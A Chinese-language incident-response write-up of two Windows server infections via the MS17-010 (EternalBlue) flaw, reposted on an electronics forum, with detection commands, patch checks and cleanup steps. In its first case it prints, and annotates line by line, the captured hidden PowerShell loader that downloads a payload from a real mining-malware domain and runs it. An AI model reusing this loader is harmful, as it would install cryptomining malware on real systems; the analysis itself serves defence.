97视频在线看免费视频,最近最好的2019中文

案例一

在公司這幾天收到 CSO 發(fā)來(lái)不少火絨告警訊息，通過(guò)查看信息發(fā)現(xiàn)是攻擊 445 端口，這一看很可能是永恒之藍(lán)呀。

通過(guò)對(duì)這臺(tái)機(jī)器端口掃描結(jié)果發(fā)現(xiàn)對(duì)方也開了 445。

135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1688/tcp  open  nsjtp-data
3389/tcp  open  ms-wbt-server
5200/tcp  open  targus-getdata
49152/tcp open  unknown
49153/tcp open  unknown
49155/tcp open  unknown
49197/tcp open  unknown
49350/tcp open  unknown
49438/tcp open  unknown
57084/tcp open  unknown
65529/tcp open  unknown
65530/tcp open  unknown
65533/tcp open  unknown

問(wèn)負(fù)責(zé)人要了密碼登錄進(jìn)去，隨手看了下任務(wù)管理器，資源占用還挺高，任務(wù)欄程序窗口也沒(méi)有，超奇怪的唉。

那我想怎么能查得到這個(gè) PowerShell 運(yùn)行的是什么腳本呀，通過(guò) google 找到一條語(yǔ)句，可查詢 powershell.exe 命令行參數(shù)。

wmic process where caption="powershell.exe" get caption,commandline /value

得到異常參數(shù)。

Caption=powershell.exe
CommandLine=powershell  -nop -w hidden -ep bypass -c "$ifp=$env:tmp+'if.bin';if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$_.ToString('X2')};if($s-ne'676e657e578e22cb7a9138d6979c46c1'){$con=''}}if(!$con){$con=(New-Object Net.WebClient).downloaddata('http://down.ackng.com/if.bin?ID=WIN-G4SEL2FMI8M&GUID=DC503C42-A0A0-EBD7-0982-249C228D246A&MAC=005632:54&OS=6.3.9600&BIT=64 位&USER=MSSQLSERVER&DOMAIN=WORKGROUP&D=&CD=Microsoft 基本顯示適配器&P=0&FI=0&FM=0&IF=0&MF=0&HR=&UP=1586108.812&_T=1572307138.34506');[System.IO.File]::WriteAllBytes($ifp,$con)}IEX(-join[char[]]$con)"

一搜其中down.ackng.com域名得知是挖礦病毒。

手動(dòng)格式化并查了一堆資料后寫下注釋。

powershell-nop -w hidden -ep bypass 
-c "    $ifp=$env:tmp+'if.bin'; # 獲取當(dāng)前用戶tmp目錄下if.bin文件信息
        if(test-path $ifp){ # 用test-path判斷if.bin文件是否存在            $con=[System.IO.File]::ReadAllBytes($ifp); # 將if.bin文件作為字節(jié)讀入內(nèi)存，不過(guò)這里是放入變量
            [System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$_.ToString('X2')}; # 計(jì)算已經(jīng)加載到內(nèi)存中if.bin文件的md5校驗(yàn)和，將內(nèi)容轉(zhuǎn)換為十六進(jìn)制存入變量s
            if($s-ne'676e657e578e22cb7a9138d6979c46c1'){$con=''} # 看校驗(yàn)和是否一至，不是就將$con清空(看看是不是自家挖礦文件)。
        }
        if(!$con){ # 如果$con沒(méi)被篡改(或不存在)繼續(xù)往下走            $con=(New-Object Net.WebClient).downloaddata('http://down.ackng.com/if.bin?ID=WIN-G4SEL2FMI8M&GUID=DC503C42-A0A0-EBD7-0982-249C228D246A&MAC=005632:54&OS=6.3.9600&BIT=64 位&USER=MSSQLSERVER&DOMAIN=WORKGROUP&D=&CD=Microsoft 基本顯示適配器&P=0&FI=0&FM=0&IF=0&MF=0&HR=&UP=1586108.812&_T=1572307138.34506');
            [System.IO.File]::WriteAllBytes($ifp,$con)
            # 創(chuàng)建一個(gè)對(duì)象，使用這個(gè)對(duì)象下載，將下載的內(nèi)容存入$con變量，隨后將$con的內(nèi)容寫入$ifp路徑。
        }
        IEX(-join[char[]]$con) # IEX=Invoke-Expression,用來(lái)執(zhí)行$con惡意內(nèi)容,搞不懂為啥要轉(zhuǎn)換數(shù)組再join連接-join[char[]]
"

根據(jù)腳本$env:tmp查看目錄中發(fā)現(xiàn)if.bin和m6.bin。

從秦蕭公眾號(hào)一篇應(yīng)急響應(yīng)文章得知判斷方法，要想斷定病毒或木馬文件可以查看詳細(xì)信息是否為空，正常文件都會(huì)帶有信息。這 tips 在整理這篇總結(jié)時(shí)才發(fā)現(xiàn)，遂記錄于此。

netstat -ano查看網(wǎng)絡(luò)連接和Wireshark抓包都沒(méi)異常連接，火絨也沒(méi)正常啟用(顯示驅(qū)動(dòng)版本不匹配)。

查詢系統(tǒng)補(bǔ)丁，服務(wù)器系統(tǒng)是 2012R2， MS17-010的 kb4012213 和 kb4012216 補(bǔ)丁都沒(méi)打，永恒之藍(lán)實(shí)錘了。

systeminfo | findstr /I "kb4012213"
systeminfo | findstr /I "kb4012216"

按基操查繼續(xù)看任務(wù)計(jì)劃、安全日志、系統(tǒng)日志、服務(wù)這幾個(gè)方面。

任務(wù)計(jì)劃發(fā)現(xiàn)命令方式都是隨機(jī)字母，執(zhí)行參數(shù)和前面混淆過(guò)的代碼差不多。

日志和服務(wù)忘記錄了，不過(guò)一般會(huì)有大量登錄失敗的痕跡，我也見過(guò)直接把日志清空的情況....

腳本執(zhí)行思路

分析 if.bin 文件，得知腳本會(huì)掃描整個(gè)內(nèi)網(wǎng) B 段和 C 段，采用 MS17-010 入侵和 3389 爆破等手段進(jìn)入機(jī)器，采用無(wú)文件方式運(yùn)行（甚至 360 開著都無(wú)法檢測(cè)出這個(gè)進(jìn)程出現(xiàn)問(wèn)題），并使用任務(wù)計(jì)劃等手段在服務(wù)器上持久化。

修復(fù)策略

刪除異常任務(wù)計(jì)劃

刪除后門文件

結(jié)束PowerShell進(jìn)程

開啟Windows防火墻，并在入站規(guī)則禁止 445。

下載AD并全盤查殺

打補(bǔ)丁

案例二

又收到一條阿里云告警信息。

進(jìn)程信息

網(wǎng)絡(luò)連接

大量連接遠(yuǎn)程主機(jī)445端口，很有可能是被當(dāng)作肉雞去攻擊別人機(jī)器。

補(bǔ)丁信息

未打 MS17-010 補(bǔ)丁。

systeminfo | find "4012215"
systeminfo | find "4012212"

主機(jī)名:           xx-xx
OS 名稱:          Microsoft Windows Server 2008 R2 Standard 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          獨(dú)立服務(wù)器
OS 構(gòu)件類型:      Multiprocessor Free
注冊(cè)的所有人:     Windows 用戶
注冊(cè)的組織:       
產(chǎn)品 ID:          00477-001-0000421-84376
初始安裝日期:     2013/6/27, 1743
系統(tǒng)啟動(dòng)時(shí)間:     2019/11/15, 2250
系統(tǒng)制造商:       Alibaba Cloud
系統(tǒng)型號(hào):         Alibaba Cloud ECS
系統(tǒng)類型:         x64-based PC
處理器:           安裝了 1 個(gè)處理器。
                  [01]: Intel64 Family 6 Model 85 Stepping 4 GenuineIntel ~2500 Mhz
BIOS 版本:        SeaBIOS 3288b3c, 2014/4/1
Windows 目錄:     C:windows
系統(tǒng)目錄:         C:windowssystem32
啟動(dòng)設(shè)備:         DeviceHarddiskVolume1
系統(tǒng)區(qū)域設(shè)置:     zh-cn;中文(中國(guó))
輸入法區(qū)域設(shè)置:   zh-cn;中文(中國(guó))
時(shí)區(qū):             (UTC+08:00)北京，重慶，香港特別行政區(qū)，烏魯木齊
物理內(nèi)存總量:     8,191 MB
可用的物理內(nèi)存:   4,079 MB
虛擬內(nèi)存: 最大值: 16,381 MB
虛擬內(nèi)存: 可用:   7,580 MB
虛擬內(nèi)存: 使用中: 8,801 MB
頁(yè)面文件位置:     D:pagefile.sys
域:               WORKGROUP
登錄服務(wù)器:       \xx-xx
修補(bǔ)程序:         安裝了 185 個(gè)修補(bǔ)程序。
                  [01]: KB981391
                  [02]: KB981392
                  [03]: KB977236
                  [04]: KB981111
                  [05]: KB977238
                  [06]: KB2849697
                  [07]: KB2849696
                  [08]: KB2841134
                  [09]: KB2841134
                  [10]: KB977239
                  [11]: KB2670838
                  [12]: KB2592687
                  [13]: KB981390
                  [14]: KB2386667
                  [15]: KB2425227
                  [16]: KB2506014
                  [17]: KB2506212
                  [18]: KB2506928
                  [19]: KB2509553
                  [20]: KB2511455
                  [21]: KB2515325
                  [22]: KB2529073
                  [23]: KB2533552
                  [24]: KB2536275
                  [25]: KB2536276
                  [26]: KB2541014
                  [27]: KB2544893
                  [28]: KB2545698
                  [29]: KB2547666
                  [30]: KB2552343
                  [31]: KB2560656
                  [32]: KB2563227
                  [33]: KB2564958
                  [34]: KB2570947
                  [35]: KB2574819
                  [36]: KB2584146
                  [37]: KB2585542
                  [38]: KB2603229
                  [39]: KB2604115
                  [40]: KB2607047
                  [41]: KB2608658
                  [42]: KB2618451
                  [43]: KB2620704
                  [44]: KB2621440
                  [45]: KB2631813
                  [46]: KB2636573
                  [47]: KB2640148
                  [48]: KB2643719
                  [49]: KB2644615
                  [50]: KB2645640
                  [51]: KB2647753
                  [52]: KB2653956
                  [53]: KB2654428
                  [54]: KB2655992
                  [55]: KB2656356
                  [56]: KB2658846
                  [57]: KB2659262
                  [58]: KB2660075
                  [59]: KB2667402
                  [60]: KB2676562
                  [61]: KB2685811
                  [62]: KB2685813
                  [63]: KB2685939
                  [64]: KB2690533
                  [65]: KB2691442
                  [66]: KB2698365
                  [67]: KB2699779
                  [68]: KB2705219
                  [69]: KB2706045
                  [70]: KB2709630
                  [71]: KB2709981
                  [72]: KB2712808
                  [73]: KB2718704
                  [74]: KB2719857
                  [75]: KB2726535
                  [76]: KB2729094
                  [77]: KB2729452
                  [78]: KB2732059
                  [79]: KB2742599
                  [80]: KB2743555
                  [81]: KB2749655
                  [82]: KB2750841
                  [83]: KB2753842
                  [84]: KB2757638
                  [85]: KB2758857
                  [86]: KB2761217
                  [87]: KB2763523
                  [88]: KB2765809
                  [89]: KB2770660
                  [90]: KB2779562
                  [91]: KB2785220
                  [92]: KB2786081
                  [93]: KB2786400
                  [94]: KB2789645
                  [95]: KB2790113
                  [96]: KB2791765
                  [97]: KB2798162
                  [98]: KB2800095
                  [99]: KB2804579
                  [100]: KB2807986
                  [101]: KB2808679
                  [102]: KB2813170
                  [103]: KB2813347
                  [104]: KB2813430
                  [105]: KB2820197
                  [106]: KB2820331
                  [107]: KB2829361
                  [108]: KB2830290
                  [109]: KB2834140
                  [110]: KB2835361
                  [111]: KB2836502
                  [112]: KB2836943
                  [113]: KB2838727
                  [114]: KB2839894
                  [115]: KB2840149
                  [116]: KB2843630
                  [117]: KB2845690
                  [118]: KB2847311
                  [119]: KB2852386
                  [120]: KB2853952
                  [121]: KB2862152
                  [122]: KB2862330
                  [123]: KB2862335
                  [124]: KB2862966
                  [125]: KB2862973
                  [126]: KB2864058
                  [127]: KB2864202
                  [128]: KB2868038
                  [129]: KB2868116
                  [130]: KB2868626
                  [131]: KB2871997
                  [132]: KB2872339
                  [133]: KB2882822
                  [134]: KB2884256
                  [135]: KB2887069
                  [136]: KB2888049
                  [137]: KB2891804
                  [138]: KB2892074
                  [139]: KB2893294
                  [140]: KB2893519
                  [141]: KB2908783
                  [142]: KB2912390
                  [143]: KB2913152
                  [144]: KB2918614
                  [145]: KB2919469
                  [146]: KB2922229
                  [147]: KB2926765
                  [148]: KB2928562
                  [149]: KB2929733
                  [150]: KB2929755
                  [151]: KB2939576
                  [152]: KB2957189
                  [153]: KB2957503
                  [154]: KB2957509
                  [155]: KB2961072
                  [156]: KB2961851
                  [157]: KB2966583
                  [158]: KB2970228
                  [159]: KB2973201
                  [160]: KB2973351
                  [161]: KB2976897
                  [162]: KB2977292
                  [163]: KB2977728
                  [164]: KB2978092
                  [165]: KB2978120
                  [166]: KB2978668
                  [167]: KB2980245
                  [168]: KB2984972
                  [169]: KB2984976
                  [170]: KB2985461
                  [171]: KB2991963
                  [172]: KB2992611
                  [173]: KB2993651
                  [174]: KB2993958
                  [175]: KB2998527
                  [176]: KB2999226
                  [177]: KB3002885
                  [178]: KB3003057
                  [179]: KB3003743
                  [180]: KB3005607
                  [181]: KB3006226
                  [182]: KB3008627
                  [183]: KB3010788
                  [184]: KB976902
                  [185]: KB982018
網(wǎng)卡:             安裝了 3 個(gè) NIC。
                  [01]: Microsoft Loopback Adapter
                      連接名:      loopback
                      啟用 DHCP:   是
                      DHCP 服務(wù)器: 255.255.255.255
                      IP 地址
                        [01]: 169.254.114.140
                        [02]: fe80:78b9728c
                  [02]: Microsoft Loopback Adapter
                      連接名:      Npcap Loopback Adapter
                      啟用 DHCP:   是
                      DHCP 服務(wù)器: 255.255.255.255
                      IP 地址
                        [01]: 169.254.219.140
                        [02]: fe80:a78edb8c
                  [03]: Red Hat VirtIO Ethernet Adapter
                      連接名:      本地連接 3
                      啟用 DHCP:   否
                      IP 地址
                        [01]: 192.168.2.18
                        [02]: fe80:ef0f6468

日志信息

根據(jù)惡意程序創(chuàng)建時(shí)間來(lái)篩查，安全日志 11 月 22 日前均被刪除。

通過(guò)查詢服務(wù)創(chuàng)建時(shí)間和釋放時(shí)間吻合。

處理

通過(guò)火絨掃描刪除惡意程序

防火墻入站規(guī)則禁止 445 連接本機(jī)。

PS：為什么文件沒(méi)有被鎖.....也許阿里云盾攔截操作了吧。

審核編輯：彭靜

聲明：本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人，不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用，如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題，請(qǐng)聯(lián)系本站處理。舉報(bào)投訴

服務(wù)器

服務(wù)器

+關(guān)注

關(guān)注
12

文章
8958

瀏覽量
85085
Shell

Shell

+關(guān)注

關(guān)注
1

文章
363

瀏覽量
23259
腳本

腳本

+關(guān)注

關(guān)注
1

文章
387

瀏覽量
14811

原文標(biāo)題：實(shí)戰(zhàn) | 記兩次應(yīng)急響應(yīng)過(guò)程

文章出處：【微信號(hào)：菜鳥學(xué)信安，微信公眾號(hào)：菜鳥學(xué)信安】歡迎添加關(guān)注！文章轉(zhuǎn)載請(qǐng)注明出處。

評(píng)論

相關(guān)推薦

使用離線包安裝IDF工具后，cmd窗口能正常運(yùn)行腳本和編譯，在啟動(dòng)powershell窗口時(shí)卻提示錯(cuò)誤，為什么？

發(fā)表于 06-13 08:13

Win10系統(tǒng)PowerShell命令匯總

1、打開PowerShell環(huán)境 Windows 10 中已內(nèi)置了 PowerShell 命令行環(huán)境，大家可以直接搜索「PowerShell」并以管理員身份運(yùn)行。或者在搜索欄中

發(fā)表于 07-24 08:08

請(qǐng)問(wèn).zjs腳本怎么編寫和運(yùn)行

.zjs腳本怎么編寫、運(yùn)行

發(fā)表于 08-18 06:25

Powershell模塊TLS無(wú)法正常工作

大家好...我在使用PowerShell與我的Intel AMT設(shè)備進(jìn)行通信時(shí)遇到問(wèn)題。它之前一直工作得很好，但現(xiàn)在我得到一個(gè)Schannel錯(cuò)誤70（協(xié)議錯(cuò)誤）我想這是因?yàn)镮ntel AMT不再

發(fā)表于 10-24 15:18

如何使用Microsoft Powershell訪問(wèn)英特爾AMT功能

Gael Hofemeier演示了如何使用Microsoft * Powershell訪問(wèn)英特爾?AMT功能。

發(fā)表于 10-30 07:09 ?2965次閱讀

怎樣用Wamp服務(wù)器運(yùn)行PHP腳本

今天讓我解釋一下如何使用wamp服務(wù)器運(yùn)行PHP文件。您可以使用此方法來(lái)運(yùn)行您可能從某個(gè)地方獲得的PHP腳本，并且?guī)缀醪恍枰驇缀醪涣私釶HP。您可以通過(guò)輸出為Web瀏覽器的Web服務(wù)器執(zhí)行腳

發(fā)表于 10-05 17:37 ?7003次閱讀

微軟PowerShell 7的5個(gè)變化

上個(gè)月微軟 PowerShell 7發(fā)布了第5個(gè)預(yù)覽版，離最終正式版本又更進(jìn)了一步。本文介紹一下PowerShell 7將帶來(lái)的5大變化，主要是一些大方向上的特性。

發(fā)表于 11-22 10:36 ?3798次閱讀

微軟PowerShell 7.0 RC的主要功能，下個(gè)月正式版本發(fā)行

PowerShell 7.0 發(fā)布了候選版本，正式版本預(yù)計(jì)于下個(gè)月發(fā)行。先來(lái)看看 PowerShell 7 中一些最主要的功能：

發(fā)表于 12-18 10:03 ?2840次閱讀

全新PowerShell 7.0發(fā)布支持多個(gè)平臺(tái)

從早期的MS-DOS到后來(lái)的Windows CMD再到如今的PowerShell，微軟在終端工具方面不斷精進(jìn)，現(xiàn)在又發(fā)布了全新的PowerShell 7.0，開源跨平臺(tái)，可在Windows、Linux、macOS各個(gè)平臺(tái)上管理異構(gòu)環(huán)境、混合云。

發(fā)表于 03-06 10:41 ?1415次閱讀

微軟發(fā)布PowerShell Crescendo預(yù)覽版

微軟近期通過(guò)博客發(fā)布了 PowerShell Crescendo 預(yù)覽版，這是一款本機(jī)命令的安裝包，一款面向管理員和開發(fā)人員的新工具。 IT之家獲悉，PowerShell Crescendo 通過(guò)

發(fā)表于 12-14 14:48 ?1135次閱讀

如何防止腳本重復(fù)運(yùn)行

已知任何系統(tǒng)在相同的路徑下,不可能出現(xiàn)兩個(gè)相同的文件名,因此思路就是在腳本運(yùn)行的開始, 獲取自身的腳本文件名稱和腳本所在路徑,然后獲取所有正在運(yùn)行

發(fā)表于 03-03 14:07 ?1308次閱讀

如何在Linux命令行中運(yùn)行Python腳本

Python 腳本。在本文中，我們將詳細(xì)介紹如何在 Linux 命令行中運(yùn)行 Python 腳本。我們將討論以下主題：

發(fā)表于 05-12 14:49 ?1640次閱讀

ie瀏覽器限制運(yùn)行腳本

IE瀏覽器限制運(yùn)行腳本是指在Internet Explorer瀏覽器中，存在一些限制和安全策略，以保護(hù)用戶的電腦免受惡意腳本的攻擊。這些限制有助于防止在瀏覽器中執(zhí)行惡意代碼，保護(hù)用戶的隱私和電腦

發(fā)表于 11-26 11:19 ?1407次閱讀

腳本錯(cuò)誤scripterror怎么解決

“腳本錯(cuò)誤”（Script Error）通常是在運(yùn)行或嘗試運(yùn)行一段腳本或程序時(shí)出現(xiàn)的錯(cuò)誤。這種錯(cuò)誤可能源于許多不同的原因，包括語(yǔ)法錯(cuò)誤、運(yùn)行

發(fā)表于 11-26 14:46 ?7662次閱讀

js腳本怎么在瀏覽器中運(yùn)行

在瀏覽器中運(yùn)行JavaScript腳本是一種常見的方式，因?yàn)镴avaScript是一種在Web瀏覽器中執(zhí)行的腳本語(yǔ)言。下面是一個(gè)詳細(xì)的，最少1500字的文章，介紹如何在瀏覽器中運(yùn)行

發(fā)表于 11-27 16:46 ?2679次閱讀

搜索歷史

PowerShell運(yùn)行的是什么腳本

評(píng)論

使用離線包安裝IDF工具后，cmd窗口能正常運(yùn)行腳本和編譯，在啟動(dòng)powershell窗口時(shí)卻提示錯(cuò)誤，為什么？

Win10系統(tǒng)PowerShell命令匯總

請(qǐng)問(wèn).zjs腳本怎么編寫和運(yùn)行

Powershell模塊TLS無(wú)法正常工作

如何使用Microsoft Powershell訪問(wèn)英特爾AMT功能

怎樣用Wamp服務(wù)器運(yùn)行PHP腳本

微軟PowerShell 7的5個(gè)變化

微軟PowerShell 7.0 RC的主要功能，下個(gè)月正式版本發(fā)行

全新PowerShell 7.0發(fā)布支持多個(gè)平臺(tái)

微軟發(fā)布PowerShell Crescendo預(yù)覽版

如何防止腳本重復(fù)運(yùn)行

如何在Linux命令行中運(yùn)行Python腳本

ie瀏覽器限制運(yùn)行腳本

腳本錯(cuò)誤scripterror怎么解決

js腳本怎么在瀏覽器中運(yùn)行